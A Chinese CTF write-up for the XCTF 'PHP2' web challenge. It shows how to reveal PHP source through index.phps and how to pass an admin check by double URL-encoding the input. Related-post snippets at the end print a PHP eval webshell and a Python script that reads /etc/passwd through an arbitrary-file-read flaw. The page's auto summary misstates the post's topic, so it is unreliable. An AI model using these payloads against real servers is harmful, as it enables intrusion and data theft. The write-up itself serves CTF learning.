【CTF】攻防世界——PHP2(web)

最新推荐文章于 2025-07-04 23:35:55 发布
原创 最新推荐文章于 2025-07-04 23:35:55 发布 · 1.6k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文探讨了利用PHP后缀名解析特性绕过文件上传限制的方法,特别是使用少见的phps后缀。通过分析index.php源码,揭示了如何通过URL双重编码绕过安全检查。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述
打开网页,只有这样一句话。源码里没有注释,没有<head>,响应包里也没什么信息。
御剑扫目录,扫出index.phps
在这里插入图片描述
这里的原理是php有很多后缀名都可以正确解析,这点通常用于绕过文件上传的黑名单限制。结合题目php2也可以想到这一点,不过phps我是真的不知道,所以手工没测出来。
在这里插入图片描述
访问获得源码,测试?id=admin可知是index.php的源码
在这里插入图片描述
在这里插入图片描述
接着分析下面的代码,可知通过url编码可以绕过。这里要注意的是,url发到服务器那里会自动解码一次,然后才传到php代码中。所以我们要进行二次编码才可以绕过:
字母a编码一次:%61
再编码一次:%2561
发送:
在这里插入图片描述
传到服务器时id变成:%61dmin,在php代码中又解码一次变成admin
在这里插入图片描述

ctfphp语言2
2201_76123071的博客
01-01 202
ctfphp
CTF-WEB攻防世界题目实战 每日一练
2401_84297035的博客
04-28 926
index.php是一个常见的文件名,通常用于Web服务器中的网站根目录下。它是默认的主页文件名,在访问一个网站时,如果没有特别指定页面文件名,则服务器会自动加载index.php文件。在Web中,index.php文件通常是网站的入口文件。它包含了处理用户请求的代码,等,同时,它是连接后端逻辑与前端界面的桥梁之一。
攻防世界PHP2
m0_74979597的博客
07-10 4327
又因为编码后参数%61dmin中存在特殊字符%,浏览器会自动进行URL解码,所以我们对%进行编码:%25。网站是由前端,后端,数据库,服务器,域名,其他组件(图像、视频、第三方API、安全认证等)组成;总之:可能考察php脚本在服务器上运行,php脚本文件的经典路径;会在服务器上执行,生成动态的HTML页面,然后将页面发送给用户的浏览器进行显示。urldecode是PHP函数,解码经过URL编码的字符串,解码回原始的形式;果然在这里,通常不可能访问到一般网站的脚本路径,更不用说是脚本的源代码;
攻防世界-PHP2
最新发布
weixin_65725423的博客
07-04 925
摘要:解题过程发现phps文件可查看PHP源代码,通过分析代码发现需对"admin"进行双重URL编码才能获取flag。知识点包括:phps文件用于展示PHP源码,浏览器会自动对URL编码进行一次解码,因此需要二次编码绕过服务器验证。最终对"admin"两次编码后成功获取flag。解题方法可加入御剑扫描配置文件提高效率。
攻防世界PHP2
qq_44111753的博客
11-17 666
题目: WP: 打开题目,查看了源码,挺莫名其妙的 搜索后发现,可以访问index.phps–index.php的源代码 php源码文件为phps,url会自动解码一次 分析代码可知,我们要得到key是第一个if的时候,要使id不等于admin,但经过url解码后,又要等于admin, 提一下url编码:%+字符对应的US-ASCII url中id的值传入后,页面解析时会自动自动进行url解码一次,所以我们可以将 a进行两次编码,第一次编码%61,第二次编码后为%2561,令id=% ...
攻防世界 PHP2要点
weixin_42251246的博客
09-07 458
index.phps 一般为网页的源码目录 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "admin") { echo "<p>Access ...
攻防世界php2
evil_ming的博客
05-14 483
有点肝累了就写点攻防世界进阶区的缓缓 打开环境 问我能不能描述一下这个网站,想到题目名php就应该是与之相关的,查看页面php源代码文件 phps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替。其实,只要不用php等已经在服务器中注册过的MIME类型为文件即可,但为了国际通用,所以才用了phps文件类型。 意思是需要我们用get传参的方式给id赋值url编码后的url,我试了一.
攻防世界WEB——Web_php_include
Zeker62的博客
08-16 578
借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下 源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函
CTF | WEB】001、攻防世界WEB题目之backup
韩非雨的博客
08-12 832
X老师忘记删除备份文件,他派小宁同学去把备份文件找出来,一起来帮小宁同学吧!找到其对应的备份文件,成功获取到flag。
攻防世界WEB进阶——Cat wp
weixin_42499640的博客
07-31 1313
首先打开题目是个发现是个云端测试 提示输入域名 先输个baidu.com 没反应 输入百度的ip 220.181.38.148 反馈了 PING 220.181.38.148 (220.181.38.148) 56(84) bytes of data. --- 220.181.38.148 ping statistics --- 1 packets transmitted, 0 receive...
CTFHub靶场————文件上传
qq_61579604的博客
10-17 406
上传一个图片文件,抓包,将后缀更改为php,并在图片代码中插入一句话木马。上传文件,抓包更改Content-Type和后缀。上传成功,复制url并蚁剑连接获取flag。上传成功,复制url并蚁剑连接获取flag。上传成功,复制url并蚁剑连接获取flag。上传一个php文件,抓包,然后双写后缀格式。上传成功,复制url并蚁剑连接获取flag。上传成功,复制url并蚁剑连接获取flag。上传成功,复制url并蚁剑连接获取flag。上传一个图片格式的文件,抓包,更改。上传一个png文件抓包,修改后缀。
攻防世界-web -高手进阶区-PHP2
wyj_1216 House
07-09 1万+
题目 writeup 首先发现源码泄露 /index.phps 查看源代码 即: <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "admin") { e...
攻防世界--PHP2
tzyyyyyy的博客
01-17 4356
攻防世界--PHP2
攻防世界Web——PHP2(CTF入门2)
m0_75051044的博客
02-03 856
分析代码,大概的意思是如果$_Get[id]等于admin,就输出not allowed,然后$_Get[id]经过URL解码,使得$_Get[id]等于admin,输出了Key,说明一开始的$_Get[id]不是admin,而是URL解码之前的,由于浏览器会对GET参数进行一次URL解码,所以原先的id是admin进行两次URL编码的,我们用御剑1.5自带的URL编码。那我们查看一下网页目录下的index.php文件,发现没有什么变化。题目是PHP2,那应该跟php文件有关,先用dirb扫描一下网页。
攻防世界 PHP2
m0_56107268的博客
05-03 421
访问/index.php 页面无反应,拿御剑扫发现有两个文件,有一个index.phps文件 什么是phps文件? phps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替。其实,只要不用php等已经在服务器中注册过的MIME类型为文件即可,但为了国际通用,所以才用了phps文件类型。 它的MIME类型为:text/html, application/x-httpd-php-source, ap..
攻防世界PHP 2
qq_74276395的博客
02-24 1130
3、通过打开bp中的decoder输入两次admin,encode得到%2、输入index.phps,然后进行代码审计。1、打开题目得到如下如图。
攻防世界PHP2
weixin_52268949的博客
01-25 889
PHP2 进入环境就一个英文其他啥都没有,英文也没啥提示信息 我们使用dirsearch扫描一下,一开始确实没扫到什么东西,到最后看了wp发现原来源码是在index.phps中,这里只提供一个思路,不必深究 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "admin") {
XCTF-攻防世界CTF平台-Web类——9、PHP2(.phps文件、url编码)
Onlyone_1314的博客
11-21 1792
先查看题目地址: 希望我们获得这个网站的权限,查看源代码也没有其他信息: 查看index页面: 之后尝试查看index.phps文件(.phps文件就是php的源代码文件,通常用于提供给访问者查看php代码): phps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替。其实,只要不用php等已经在服> 务器中注册过的MIME类型为文件即可,但为了国际通用,所以才用了phps文件类型。 它的
攻防世界-PHP2详解
热门推荐
Mr_helloword的博客
08-11 1万+
PHP2 进入后神门也没有查看源代码也没 根据提示我们进行后台扫描发现phps(这里phps是我自己加入字典里的,记住就好,主要是告诉大家一个方法) 发现源代码; 查看源代码: <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "admin") { echo "&
攻防世界ph2
03-27
### 攻防世界 PH2 CTF 比赛第二阶段解题思路 #### 1. 初步分析题目环境 在攻防世界CTF比赛中,PH2通常涉及更复杂的Web漏洞利用场景。根据已知的信息[^1],该阶段可能涉及到文件上传、PHP代码执行以及绕过特定的安全机制等内容。 #### 2. 文件上传与过滤规避 由于题目对常见的PHP后缀进行了严格过滤,因此需要采用一些技巧来实现恶意脚本的运行。一种常见的方式是通过使用无后缀或者特殊后缀的文件配合服务器配置错误达到目的。例如,在某些情况下可以尝试如下payload: ```php <?=@eval($_POST['flag']);?> ``` 此代码片段是一种非常简洁的PHP木马形式,能够接受来自`$_POST['flag']`的数据并对其进行评估执行[^2]。 #### 3. 使用蚁剑或其他工具建立连接 一旦成功上传了一个可被执行的PHP脚本,则可以通过诸如蚁剑这样的远程管理工具与其建立连接。具体操作上需要注意的是确保所使用的连接方式不会被额外的日志记录功能捕获从而暴露攻击路径。 #### 4. 报错处理与深入理解 对于过程中遇到的一些异常报错情况,虽然可能是由靶场本身引起的问题[^3],但也应该仔细研究其背后的原因。这不仅有助于当前问题解决还能够在以后类似的竞赛中有更好的表现。 #### 5. 结合其他漏洞完成目标 除了上述提到的内容外,还有可能存在其他的辅助性漏洞比如任意文件读取漏洞或是Python Flask框架下的Session伪造漏洞等[^4]。合理运用这些条件往往能事半功倍地达成最终的目标——获取Flag值。 ```python import requests from bs4 import BeautifulSoup def exploit_arbitrary_file_read(url, file_path): payload = {'file': (None, file_path)} response = requests.post(url + '/read', files=payload) soup = BeautifulSoup(response.text, 'html.parser') return soup.get_text() print(exploit_arbitrary_file_read('http://example.com/vulnerable-app', '/etc/passwd')) ``` 以上展示了一段简单的Python代码用于演示如何利用假设存在的任意文件读取漏洞去读取系统上的敏感信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值